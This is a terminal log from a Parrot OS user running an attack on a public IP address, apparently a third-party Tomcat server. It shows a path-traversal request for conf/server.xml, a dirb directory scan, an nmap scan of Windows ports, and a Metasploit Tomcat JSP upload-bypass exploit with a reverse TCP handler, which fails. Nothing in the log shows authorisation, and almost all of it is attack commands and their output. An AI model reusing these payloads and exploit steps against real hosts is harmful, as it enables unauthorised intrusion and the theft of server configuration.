┌─[marcos_os@parrot]─[~]
└──╼ $wget "http://189.254.143.102/examples/jsp/include/include.jsp?page=../../../../conf/server.xml" -O server.xml
--2025-09-30 18:07:08--  http://189.254.143.102/examples/jsp/include/include.jsp?page=../../../../conf/server.xml
Conectando con 189.254.143.102:80... conectado.
Petición HTTP enviada, esperando respuesta... 302 Movido temporalmente
Localización: https://189.254.143.102/examples/jsp/include/include.jsp?page=../../../../conf/server.xml [siguiendo]
--2025-09-30 18:07:08--  https://189.254.143.102/examples/jsp/include/include.jsp?page=../../../../conf/server.xml
Conectando con 189.254.143.102:443... conectado.
El propietario del certificado no se ajusta al nombre de equipo «189.254.143.102»

┌─[✗]─[marcos_os@parrot]─[~]
└──╼ $# Buscar archivos de configuración expuestos
dirb http://189.254.143.102 /usr/share/dirb/wordlists/common.txt -o dirb_scan.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: dirb_scan.txt
START_TIME: Tue Sep 30 18:07:54 2025
URL_BASE: http://189.254.143.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://189.254.143.102/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                               
-----------------
END_TIME: Tue Sep 30 18:07:54 2025
DOWNLOADED: 0 - FOUND: 0


┌─[marcos_os@parrot]─[~]
└──╼ $nmap -p 135,139,445,3389 189.254.143.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-30 18:09 CST
Nmap scan report for customer-189-254-143-102-sta.uninet-ide.com.mx (189.254.143.102)
Host is up (0.059s latency).

PORT     STATE    SERVICE
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 1.71 seconds

[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_jsp_upload_bypass) >> exploit
[*] Started reverse TCP handler on 192.168.100.21:4444 
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

